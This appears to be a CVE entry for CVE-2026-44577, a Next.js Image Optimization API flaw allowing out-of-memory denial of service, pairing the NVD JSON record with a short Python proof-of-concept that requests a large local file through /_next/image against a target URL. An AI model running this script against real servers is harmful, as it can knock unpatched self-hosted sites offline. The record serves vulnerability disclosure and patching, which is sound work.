CVE-2026-44577

import requests def exploit_nextjs_dos(target_url, local_file_path): """ Proof of Concept for CVE-2026-44577 Attempts to trigger OOM by requesting a large local file via the Image Optimization API. """ # Construct the malicious URL pointing to a local large file # Assuming default config allows local patterns or specific known patterns # The payload targets the /_next/image endpoint payload_url = f"{target_url}/_next/image?url={local_file_path}&w=1&q=1" try: print(f"Sending request to: {payload_url}") response = requests.get(payload_url) print(f"Response Status: {response.status_code}") print("Check server memory usage and availability.") except Exception as e: print(f"Request failed: {e}") # Example usage # target = "http://localhost:3000" # large_file = "/var/log/syslog" # exploit_nextjs_dos(target, large_file)

{"cve": {"id": "CVE-2026-44577", "sourceIdentifier": "[email protected]", "published": "2026-05-13T17:16:23.173", "lastModified": "2026-05-13T20:00:59.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "15.5.16", "matchCriteriaId": "1285DDF1-644C-49F3-8418-2615C467B282"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.2.5", "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"}]}]}], "references": [{"url": "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}